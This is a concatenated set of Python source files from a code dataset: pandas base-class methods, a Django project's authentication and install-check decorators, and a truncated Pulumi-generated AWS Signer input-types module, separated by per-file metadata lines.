self,
sort=sort,
ascending=ascending,
normalize=normalize,
bins=bins,
dropna=dropna,
)
def unique(self):
values = self._values
if not isinstance(values, np.ndarray):
result: ArrayLike = values.unique()
if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
# GH#31182 Series._values returns EA, unpack for backward-compat
if getattr(self.dtype, "tz", None) is None:
result = np.asarray(result)
else:
result = unique1d(values)
return result
def nunique(self, dropna: bool = True) -> int:
"""
Return number of unique elements in the object.
Excludes NA values by default.
Parameters
----------
dropna : bool, default True
Don't include NaN in the count.
Returns
-------
int
See Also
--------
DataFrame.nunique: Method nunique for DataFrame.
Series.count: Count non-NA/null observations in the Series.
Examples
--------
>>> s = pd.Series([1, 3, 5, 7, 7])
>>> s
0 1
1 3
2 5
3 7
4 7
dtype: int64
>>> s.nunique()
4
"""
uniqs = self.unique()
if dropna:
uniqs = remove_na_arraylike(uniqs)
return len(uniqs)
@property
def is_unique(self) -> bool:
"""
Return boolean if values in the object are unique.
Returns
-------
bool
"""
return self.nunique(dropna=False) == len(self)
@property
def is_monotonic(self) -> bool:
"""
Return boolean if values in the object are
monotonic_increasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic
@property
def is_monotonic_increasing(self) -> bool:
"""
Alias for is_monotonic.
"""
# mypy complains if we alias directly
return self.is_monotonic
@property
def is_monotonic_decreasing(self) -> bool:
"""
Return boolean if values in the object are
monotonic_decreasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic_decreasing
def _memory_usage(self, deep: bool = False) -> int:
"""
Memory usage of the values.
Parameters
----------
deep : bool, default False
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption.
Returns
-------
bytes used
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False or if used on PyPy
"""
if hasattr(self.array, "memory_usage"):
# https://github.com/python/mypy/issues/1424
# error: "ExtensionArray" has no attribute "memory_usage"
return self.array.memory_usage(deep=deep) # type: ignore[attr-defined]
v = self.array.nbytes
if deep and is_object_dtype(self) and not PYPY:
values = cast(np.ndarray, self._values)
v += lib.memory_usage_of_objects(values)
return v
@doc(
algorithms.factorize,
values="",
order="",
size_hint="",
sort=textwrap.dedent(
"""\
sort : bool, default False
Sort `uniques` and shuffle `codes` to maintain the
relationship.
"""
),
)
def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
@final
def _duplicated(
self, keep: Literal["first", "last", False] = "first"
) -> npt.NDArray[np.bool_]:
return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
def _construct_result(self, result, name):
"""
Construct an appropriately-wrapped result from the ArrayLike result
of an arithmetic-like operation.
"""
raise AbstractMethodError(self)
| 30.338836
| 88
| 0.560208
|
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
_cache: dict[str, Any]
@property
def _constructor(self):
return type(self)
def __repr__(self) -> str:
return object.__repr__(self)
def _reset_cache(self, key: str | None = None) -> None:
if not hasattr(self, "_cache"):
return
if key is None:
self._cache.clear()
else:
self._cache.pop(key, None)
def __sizeof__(self) -> int:
memory_usage = getattr(self, "memory_usage", None)
if memory_usage:
mem = memory_usage(deep=True)
return int(mem if is_scalar(mem) else mem.sum())
return super().__sizeof__()
class NoNewAttributesMixin:
def _freeze(self):
object.__setattr__(self, "__frozen", True)
# prevent adding any attribute via s.xxx.new_attribute = ...
def __setattr__(self, key: str, value):
# _cache is used by a decorator
# We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
# because
# 1.) getattr is false for attributes that raise errors
# 2.) cls.__dict__ doesn't traverse into base classes
if getattr(self, "__frozen", False) and not (
key == "_cache"
or key in type(self).__dict__
or getattr(self, key, None) is not None
):
raise AttributeError(f"You cannot add any new attribute '{key}'")
object.__setattr__(self, key, value)
class DataError(Exception):
pass
class SpecificationError(Exception):
pass
class SelectionMixin(Generic[FrameOrSeries]):
obj: FrameOrSeries
_selection: IndexLabel | None = None
exclusions: frozenset[Hashable]
_internal_names = ["_cache", "__setstate__"]
_internal_names_set = set(_internal_names)
@final
@property
def _selection_list(self):
if not isinstance(
self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
):
return [self._selection]
return self._selection
@cache_readonly
def _selected_obj(self):
if self._selection is None or isinstance(self.obj, ABCSeries):
return self.obj
else:
return self.obj[self._selection]
@final
@cache_readonly
def ndim(self) -> int:
return self._selected_obj.ndim
@final
@cache_readonly
def _obj_with_exclusions(self):
if self._selection is not None and isinstance(self.obj, ABCDataFrame):
return self.obj[self._selection_list]
if len(self.exclusions) > 0:
return self.obj._drop_axis(
self.exclusions, axis=1, consolidate=False, only_slice=True
)
else:
return self.obj
def __getitem__(self, key):
if self._selection is not None:
raise IndexError(f"Column(s) {self._selection} already selected")
if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
if len(self.obj.columns.intersection(key)) != len(key):
bad_keys = list(set(key).difference(self.obj.columns))
raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
return self._gotitem(list(key), ndim=2)
elif not getattr(self, "as_index", False):
if key not in self.obj.columns:
raise KeyError(f"Column not found: {key}")
return self._gotitem(key, ndim=2)
else:
if key not in self.obj:
raise KeyError(f"Column not found: {key}")
subset = self.obj[key]
ndim = subset.ndim
return self._gotitem(key, ndim=ndim, subset=subset)
def _gotitem(self, key, ndim: int, subset=None):
raise AbstractMethodError(self)
def aggregate(self, func, *args, **kwargs):
raise AbstractMethodError(self)
agg = aggregate
class IndexOpsMixin(OpsMixin):
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"]
)
@property
def dtype(self) -> DtypeObj:
raise AbstractMethodError(self)
@property
def _values(self) -> ExtensionArray | np.ndarray:
raise AbstractMethodError(self)
def transpose(self: _T, *args, **kwargs) -> _T:
nv.validate_transpose(args, kwargs)
return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
return self._values.shape
def __len__(self) -> int:
raise AbstractMethodError(self)
@property
def ndim(self) -> int:
return 1
def item(self):
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
@property
def nbytes(self) -> int:
return self._values.nbytes
@property
def size(self) -> int:
return len(self._values)
@property
def array(self) -> ExtensionArray:
raise AbstractMethodError(self)
def to_numpy(
self,
dtype: npt.DTypeLike | None = None,
copy: bool = False,
na_value=lib.no_default,
**kwargs,
) -> np.ndarray:
if is_extension_array_dtype(self.dtype):
return self.array.to_numpy(
dtype, copy=copy, na_value=na_value, **kwargs
)
elif kwargs:
bad_keys = list(kwargs.keys())[0]
raise TypeError(
f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
)
result = np.asarray(self._values, dtype=dtype)
if copy or na_value is not lib.no_default:
result = result.copy()
if na_value is not lib.no_default:
result[self.isna()] = na_value
return result
@property
def empty(self) -> bool:
return not self.size
def max(self, axis=None, skipna: bool = True, *args, **kwargs):
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return nanops.nanmax(self._values, skipna=skipna)
@doc(op="max", oppose="min", value="largest")
def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmax()
else:
return nanops.nanargmax(
delegate, skipna=skipna
)
def min(self, axis=None, skipna: bool = True, *args, **kwargs):
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
return nanops.nanargmin(
delegate, skipna=skipna
)
def tolist(self):
if not isinstance(self._values, np.ndarray):
return list(self._values)
return self._values.tolist()
to_list = tolist
def __iter__(self):
if not isinstance(self._values, np.ndarray):
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
@cache_readonly
def hasnans(self) -> bool:
return bool(isna(self).any())
def isna(self):
return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
@final
def _map_values(self, mapper, na_action=None):
if is_dict_like(mapper):
if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
dict_with_default = mapper
mapper = lambda x: dict_with_default[x]
else:
# convert to an Series for efficiency.
# we specify the keys here to handle the
# possibility that they are tuples
# The return value of mapping with an empty mapper is
# expected to be pd.Series(np.nan, ...). As np.nan is
# of dtype float64 the return value of this method should
# be float64 as well
mapper = create_series_with_explicit_dtype(
mapper, dtype_if_empty=np.float64
)
if isinstance(mapper, ABCSeries):
# Since values were input this means we came from either
# a dict or a series and mapper should be an index
if is_categorical_dtype(self.dtype):
# use the built in categorical series mapper which saves
# time by mapping the categories instead of all values
cat = cast("Categorical", self._values)
return cat.map(mapper)
values = self._values
indexer = mapper.index.get_indexer(values)
new_values = algorithms.take_nd(mapper._values, indexer)
return new_values
# we must convert to python types
if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
# GH#23179 some EAs do not have `map`
values = self._values
if na_action is not None:
raise NotImplementedError
map_f = lambda values, f: values.map(f)
else:
values = self._values.astype(object)
if na_action == "ignore":
map_f = lambda values, f: lib.map_infer_mask(
values, f, isna(values).view(np.uint8)
)
elif na_action is None:
map_f = lib.map_infer
else:
msg = (
"na_action must either be 'ignore' or None, "
f"{na_action} was passed"
)
raise ValueError(msg)
# mapper is a function
new_values = map_f(values, mapper)
return new_values
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
return value_counts(
self,
sort=sort,
ascending=ascending,
normalize=normalize,
bins=bins,
dropna=dropna,
)
def unique(self):
values = self._values
if not isinstance(values, np.ndarray):
result: ArrayLike = values.unique()
if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
# GH#31182 Series._values returns EA, unpack for backward-compat
if getattr(self.dtype, "tz", None) is None:
result = np.asarray(result)
else:
result = unique1d(values)
return result
def nunique(self, dropna: bool = True) -> int:
uniqs = self.unique()
if dropna:
uniqs = remove_na_arraylike(uniqs)
return len(uniqs)
@property
def is_unique(self) -> bool:
return self.nunique(dropna=False) == len(self)
@property
def is_monotonic(self) -> bool:
from pandas import Index
return Index(self).is_monotonic
@property
def is_monotonic_increasing(self) -> bool:
# mypy complains if we alias directly
return self.is_monotonic
@property
def is_monotonic_decreasing(self) -> bool:
from pandas import Index
return Index(self).is_monotonic_decreasing
def _memory_usage(self, deep: bool = False) -> int:
if hasattr(self.array, "memory_usage"):
# https://github.com/python/mypy/issues/1424
# error: "ExtensionArray" has no attribute "memory_usage"
return self.array.memory_usage(deep=deep) # type: ignore[attr-defined]
v = self.array.nbytes
if deep and is_object_dtype(self) and not PYPY:
values = cast(np.ndarray, self._values)
v += lib.memory_usage_of_objects(values)
return v
@doc(
algorithms.factorize,
values="",
order="",
size_hint="",
sort=textwrap.dedent(
"""\
sort : bool, default False
Sort `uniques` and shuffle `codes` to maintain the
relationship.
"""
),
)
def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
@final
def _duplicated(
self, keep: Literal["first", "last", False] = "first"
) -> npt.NDArray[np.bool_]:
return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
def _construct_result(self, result, name):
raise AbstractMethodError(self)
| true
| true
|
790dabad8750b692755b533b3315b84491588b56
| 3,339
|
py
|
Python
|
app/modules/core/decorators.py
|
Clivern/Kraven
|
5d8d2de26e170d853d7d5f2b1f2d453ab07e4401
|
[
"Apache-2.0"
] | 3
|
2018-07-22T22:36:09.000Z
|
2019-05-31T10:29:54.000Z
|
app/modules/core/decorators.py
|
Clivern/Kraven
|
5d8d2de26e170d853d7d5f2b1f2d453ab07e4401
|
[
"Apache-2.0"
] | 41
|
2018-07-22T22:07:52.000Z
|
2018-11-14T11:07:48.000Z
|
app/modules/core/decorators.py
|
Clivern/Kraven
|
5d8d2de26e170d853d7d5f2b1f2d453ab07e4401
|
[
"Apache-2.0"
] | 1
|
2020-04-24T12:55:27.000Z
|
2020-04-24T12:55:27.000Z
|
"""
Custom Decorators
"""
# Django
from django.shortcuts import redirect, reverse
from django.http import JsonResponse
from django.utils.translation import gettext as _
from django.http import Http404
# local Django
from app.modules.util.helpers import Helpers
from app.modules.core.response import Response
from app.modules.entity.option_entity import Option_Entity
def redirect_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
if "redirect" in request.GET:
return redirect(request.GET["redirect"])
return redirect("app.web.admin.dashboard")
return function(controller, request, *args, **kwargs)
return wrap
def login_if_not_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated:
return redirect(reverse("app.web.login") + "?redirect=" + request.get_full_path())
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Access forbidden for authenticated users.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def redirect_if_not_installed(function):
def wrap(controller, request, *args, **kwargs):
installed = False if Option_Entity().get_one_by_key("app_installed") is False else True
if not installed:
return redirect("app.web.install")
return function(controller, request, *args, **kwargs)
return wrap
def protect_metric_with_auth_key(function):
def wrap(controller, request, *args, **kwargs):
if kwargs["type"] == "prometheus":
prometheus_token = Option_Entity().get_one_by_key("prometheus_token")
if prometheus_token.value != "" and ("HTTP_AUTHORIZATION" not in request.META or prometheus_token.value != request.META["HTTP_AUTHORIZATION"]):
raise Http404("Host not found.")
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_installed(function):
def wrap(controller, request, *args, **kwargs):
installed = False if Option_Entity().get_one_by_key("app_installed") is False else True
if installed:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Application is already installed.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def log_request_data(function):
def wrap(controller, request, *args, **kwargs):
_helper = Helpers()
_logger = _helper.get_logger(__name__)
_logger.debug(_("Request Method: %s") % request.method)
_logger.debug(_("Request URL: %s") % request.path)
_logger.debug(_("Request Body: %s") % request.body)
return function(controller, request, *args, **kwargs)
return wrap
| 37.943182
| 155
| 0.668763
|
from django.shortcuts import redirect, reverse
from django.http import JsonResponse
from django.utils.translation import gettext as _
from django.http import Http404
from app.modules.util.helpers import Helpers
from app.modules.core.response import Response
from app.modules.entity.option_entity import Option_Entity
def redirect_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
if "redirect" in request.GET:
return redirect(request.GET["redirect"])
return redirect("app.web.admin.dashboard")
return function(controller, request, *args, **kwargs)
return wrap
def login_if_not_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated:
return redirect(reverse("app.web.login") + "?redirect=" + request.get_full_path())
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Access forbidden for authenticated users.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def redirect_if_not_installed(function):
def wrap(controller, request, *args, **kwargs):
installed = False if Option_Entity().get_one_by_key("app_installed") is False else True
if not installed:
return redirect("app.web.install")
return function(controller, request, *args, **kwargs)
return wrap
def protect_metric_with_auth_key(function):
def wrap(controller, request, *args, **kwargs):
if kwargs["type"] == "prometheus":
prometheus_token = Option_Entity().get_one_by_key("prometheus_token")
if prometheus_token.value != "" and ("HTTP_AUTHORIZATION" not in request.META or prometheus_token.value != request.META["HTTP_AUTHORIZATION"]):
raise Http404("Host not found.")
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_installed(function):
def wrap(controller, request, *args, **kwargs):
installed = False if Option_Entity().get_one_by_key("app_installed") is False else True
if installed:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Application is already installed.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def log_request_data(function):
def wrap(controller, request, *args, **kwargs):
_helper = Helpers()
_logger = _helper.get_logger(__name__)
_logger.debug(_("Request Method: %s") % request.method)
_logger.debug(_("Request URL: %s") % request.path)
_logger.debug(_("Request Body: %s") % request.body)
return function(controller, request, *args, **kwargs)
return wrap
| true
| true
|
790dacbafc49042cca1ce842ab68f6c32c98f502
| 10,765
|
py
|
Python
|
sdk/python/pulumi_aws/signer/_inputs.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/signer/_inputs.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/signer/_inputs.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'SigningJobDestinationArgs',
'SigningJobDestinationS3Args',
'SigningJobRevocationRecordArgs',
'SigningJobSignedObjectArgs',
'SigningJobSignedObjectS3Args',
'SigningJobSourceArgs',
'SigningJobSourceS3Args',
'SigningProfileRevocationRecordArgs',
'SigningProfileSignatureValidityPeriodArgs',
]
@pulumi.input_type
class SigningJobDestinationArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobDestinationS3Args']):
"""
:param pulumi.Input['SigningJobDestinationS3Args'] s3: A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobDestinationS3Args']:
"""
A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobDestinationS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobDestinationS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
prefix: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] bucket: Name of the S3 bucket.
:param pulumi.Input[str] prefix: An Amazon S3 object key prefix that you can use to limit signed objects keys to begin with the specified prefix.
"""
pulumi.set(__self__, "bucket", bucket)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
Name of the S3 bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def prefix(self) -> Optional[pulumi.Input[str]]:
"""
An Amazon S3 object key prefix that you can use to limit signed objects keys to begin with the specified prefix.
"""
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix", value)
@pulumi.input_type
class SigningJobRevocationRecordArgs:
def __init__(__self__, *,
reason: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if reason is not None:
pulumi.set(__self__, "reason", reason)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningJobSignedObjectArgs:
def __init__(__self__, *,
s3s: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]] s3s: A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
if s3s is not None:
pulumi.set(__self__, "s3s", s3s)
@property
@pulumi.getter
def s3s(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]:
"""
A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
return pulumi.get(self, "s3s")
@s3s.setter
def s3s(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]):
pulumi.set(self, "s3s", value)
@pulumi.input_type
class SigningJobSignedObjectS3Args:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] bucket: Name of the S3 bucket.
:param pulumi.Input[str] key: Key name of the object that contains your unsigned code.
"""
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if key is not None:
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
Name of the S3 bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Key name of the object that contains your unsigned code.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@pulumi.input_type
class SigningJobSourceArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobSourceS3Args']):
"""
:param pulumi.Input['SigningJobSourceS3Args'] s3: A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
